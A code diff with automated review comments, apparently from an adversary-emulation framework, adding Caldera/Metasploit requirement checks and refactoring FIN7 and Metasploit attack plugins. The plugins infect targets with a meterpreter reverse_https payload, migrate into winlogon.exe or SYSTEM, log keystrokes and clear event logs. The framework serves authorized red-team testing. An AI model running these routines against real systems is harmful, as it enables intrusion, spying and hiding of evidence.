diff --git a/plugins/base/attack.py b/plugins/base/attack.py index e9f18c3..0533a12 100644 --- a/plugins/base/attack.py +++ b/plugins/base/attack.py @@ -3,11 +3,19 @@ import os from plugins.base.plugin_base import BasePlugin -from app.exceptions import PluginError, ConfigurationError +from app.exceptions import PluginError, ConfigurationError, RequirementError from app.calderacontrol import CalderaControl # from app.metasploit import MSFVenom, Metasploit from typing import Optional from plugins.base.machinery import MachineryPlugin +from app.metasploit import MetasploitInstant +from enum import Enum + + +class Requirement(Enum): + """ Requirements for this plugin """ + METASPLOIT = 1 + CALDERA = 2 class AttackPlugin(BasePlugin): @@ -23,6 +31,8 @@ class AttackPlugin(BasePlugin): required_files_attacker: list[str] = [] # a list of files to automatically install to the attacker required_files_target: list[str] = [] # a list of files to automatically copy to the targets + requirements: Optional[list[Requirement]] = [] # Requirements to run this plugin + # TODO: parse results def __init__(self): 
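Review bot: The module-level `from app.metasploit import MetasploitInstant` sits directly under the commented-out `# from app.metasploit import MSFVenom, Metasploit`, and if that earlier line was disabled to break an import cycle between `app.metasploit` and the plugin base, the new import reintroduces it; a function-local import inside `connect_metasploit` would avoid that. The `Requirement` docstring could state what the values are used for, e.g. `"""External services an AttackPlugin may list in `requirements`; consulted by needs_caldera()/needs_metasploit()."""`.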
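Review bot: `requirements: Optional[list[Requirement]] = []` declares None as a valid value, but `needs_caldera`/`needs_metasploit` in the next hunk evaluate `Requirement.X in self.requirements`, which raises TypeError on None; either drop the `Optional` or guard the membership test. A list as a class attribute is also shared by every subclass and instance, so an in-place `.append` in one plugin would leak into all of them; an immutable default avoids this: `requirements: tuple[Requirement, ...] = ()  # external services this plugin depends on; subclasses override`. Subclasses that assign a list, as FIN7 does later in this diff, keep working because `in` accepts either.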
@@ -38,6 +48,25 @@ class AttackPlugin(BasePlugin): self.metasploit_user: str = "user" self.metasploit = None + def needs_caldera(self) -> bool: + """ Returns True if this plugin has Caldera in the requirements """ + if Requirement.CALDERA in self.requirements: + return True + return False + + def needs_metasploit(self) -> bool: + """ Returns True if this plugin has Metasploit in the requirements """ + if Requirement.METASPLOIT in self.requirements: + return True + return False + + def connect_metasploit(self): + """ Inits metasploit """ + + if self.needs_metasploit(): + self.metasploit = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user) + # If metasploit requirements are not set, self.metasploit stay None and using metasploit from a plugin not having the requirements will trigger an exception + def copy_to_attacker_and_defender(self): """ Copy attacker/defender specific files to the machines. Called by setup, do not call it yourself. template processing happens before """ @@ -103,7 +132,9 @@ class AttackPlugin(BasePlugin): @param caldera: The caldera object to connect through """ - self.caldera = caldera + + if self.needs_caldera(): + self.caldera = caldera def caldera_attack(self, target: MachineryPlugin, ability_id: str, parameters=None, **kwargs): """ Attack a single target using caldera @@ -113,6 +144,9 @@ class AttackPlugin(BasePlugin): @param parameters: parameters to pass to the ability """ + if not self.needs_caldera(): + raise RequirementError("Caldera not in requirements") + self.caldera.attack(paw=target.get_paw(), ability_id=ability_id, group=target.get_group(), diff --git a/plugins/default/adversary_emulations/FIN7/fin7_section1.py b/plugins/default/adversary_emulations/FIN7/fin7_section1.py index e035b3e..cd6f845 100644 --- a/plugins/default/adversary_emulations/FIN7/fin7_section1.py +++ b/plugins/default/adversary_emulations/FIN7/fin7_section1.py 
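Review bot: `connect_metasploit` silently leaves `self.metasploit` as None when METASPLOIT is not declared, and the trailing comment promises that later use "will trigger an exception" — that exception is an AttributeError on None, whereas `caldera_attack` in the last hunk of this file raises `RequirementError` for the equivalent situation. Making the two paths consistent is small: add `else:` / `raise RequirementError("Metasploit not in requirements")`, or return early and have callers test `self.metasploit is None`. Calling `connect_metasploit` twice also builds a second `MetasploitInstant`; the FIN7 caller guards against that itself, so a `self.metasploit is None` check here would centralise it. Stylistically, `needs_caldera`/`needs_metasploit` reduce to `return Requirement.CALDERA in self.requirements` and `return Requirement.METASPLOIT in self.requirements`.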
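Review bot: After this change `set_caldera` silently discards the passed object unless CALDERA is declared in `requirements`, which is not visible from the surviving docstring line `@param caldera: The caldera object to connect through`; the docstring should say so, e.g. add `Ignored (self.caldera stays None) unless Requirement.CALDERA is in self.requirements.` The method's definition line and the rest of its docstring are outside the hunk.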
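Review bot: The new guard covers only the missing-requirement case; a plugin that declares CALDERA but was never given a controller via `set_caldera` still reaches `self.caldera.attack(...)` with None and fails with AttributeError instead of a RequirementError. Extending the check keeps the error type uniform: `if not self.needs_caldera() or self.caldera is None:` followed by `raise RequirementError("Caldera not in requirements or not connected")`. The remainder of the `self.caldera.attack(...)` call continues outside the hunk.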
@@ -3,7 +3,7 @@ # Adversary emulation for FIN7 import socket -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.interface_sfx import CommandlineColors from app.metasploit import MSFVenom, MetasploitInstant import os @@ -20,6 +20,8 @@ class FIN7Plugin(AttackPlugin): required_files_attacker = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.CALDERA, Requirement.METASPLOIT] + ###### payload_type_1 = "windows/x64/meterpreter/reverse_https" # payload for initial stage @@ -33,14 +35,15 @@ class FIN7Plugin(AttackPlugin): @param payload: payload description. waiting for this payload. Like "windows/x64/meterpreter/reverse_https" """ - if self.metasploit_1: - return self.metasploit_1 + if self.metasploit: + return self.metasploit + + self.connect_metasploit() - self.metasploit_1 = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user) ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) - self.metasploit_1.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip) - self.metasploit_1.wait_for_session() - return self.metasploit_1 + self.metasploit.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip) + self.metasploit.wait_for_session() + return self.metasploit def step1(self): self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Step 1 (target hotelmanager): Initial Breach{CommandlineColors.ENDC}", 1) diff --git a/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py b/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py index 7c33e73..9ef0b5f 100644 --- a/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py 
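Review bot: After `self.connect_metasploit()` the method dereferences `self.metasploit` unconditionally, but `connect_metasploit` (base class, earlier in this diff) leaves it None when METASPLOIT is not in `requirements`; the class attribute added two hunks up makes that true for FIN7 today, yet a subclass overriding `requirements` would get an AttributeError here, so `if self.metasploit is None: raise RequirementError("Metasploit not in requirements")` after the connect call makes the failure explicit (`RequirementError` comes from `app.exceptions`). The early return `if self.metasploit:` tests truthiness of a MetasploitInstant object; `if self.metasploit is not None:` says what is meant and does not depend on that class defining `__bool__`/`__len__`. The removed `self.metasploit_1` attribute may still be initialised elsewhere in this file (no `__init__` is in the hunk), so it is worth checking that no stale assignment remains. The enclosing method's signature and the start of its docstring are outside the hunk.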
+++ b/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py @@ -38,7 +38,8 @@ class MetasploitClearevPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, + outfile=payload_name, + format="exe", architecture="x64") metasploit.clearev(target) diff --git a/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py b/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py index eaaef44..3007ccb 100644 --- a/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py +++ b/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py @@ -38,7 +38,8 @@ class MetasploitGetuidPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, + outfile=payload_name, + format="exe", architecture="x64") uid = metasploit.getuid(target) diff --git a/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py b/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py index f4b12f3..0907804 100644 --- a/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py +++ b/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py @@ -38,7 +38,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, + outfile=payload_name, + format="exe", architecture="x64") metasploit.migrate(target, name="winlogon.exe") diff --git a/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py b/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py index 5772f83..bef5798 100644 --- a/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py +++ b/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py 
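Review bot: `format="exe"` and `architecture="x64"` are now repeated verbatim in every metasploit plugin touched here (clearev, getuid, keylogging, ps, screengrab and sysinfo); if `smart_infect` has defaults for them the calls can drop both keywords, otherwise a pair of class attributes on `AttackPlugin` (e.g. `payload_format = "exe"` and `payload_architecture = "x64"`, passed as `format=self.payload_format`) would keep the six call sites in step the next time the API changes. The keyword `format` also implies a parameter named after the builtin inside `smart_infect` (not in this diff); `payload_format` or `fmt` would be the usual choice. Each `smart_infect(` call is inside a method whose definition is outside the hunk.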
@@ -38,7 +38,8 @@ class MetasploitPsPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, + outfile=payload_name, + format="exe", architecture="x64") metasploit.ps_process_discovery(target) diff --git a/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py b/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py index c48fcdb..a1856e6 100644 --- a/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py +++ b/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py @@ -38,7 +38,8 @@ class MetasploitScreengrabPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, + outfile=payload_name, + format="exe", architecture="x64") metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM") diff --git a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py index 1740af6..29ff19f 100644 --- a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py +++ b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py @@ -38,8 +38,9 @@ class MetasploitSysinfoPlugin(AttackPlugin): metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, - architecture="x86") + outfile=payload_name, + format="exe", + architecture="x64") si = metasploit.sysinfo(target) print(f"Sysinfo: {si}")
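Review bot: The switch from `architecture="x86"` to `"x64"` is a behaviour change hidden inside an otherwise mechanical keyword rename, and a reader of the five identical sibling hunks would not expect it; if the intent is to align with the x64 payload the other plugins use, a comment on the line keeps that visible: `architecture="x64")  # aligned with the other metasploit plugins; was x86`. If the x86 payload was deliberate for a 32-bit target, that line belongs in its own commit rather than the rename. The enclosing method starts outside the hunk.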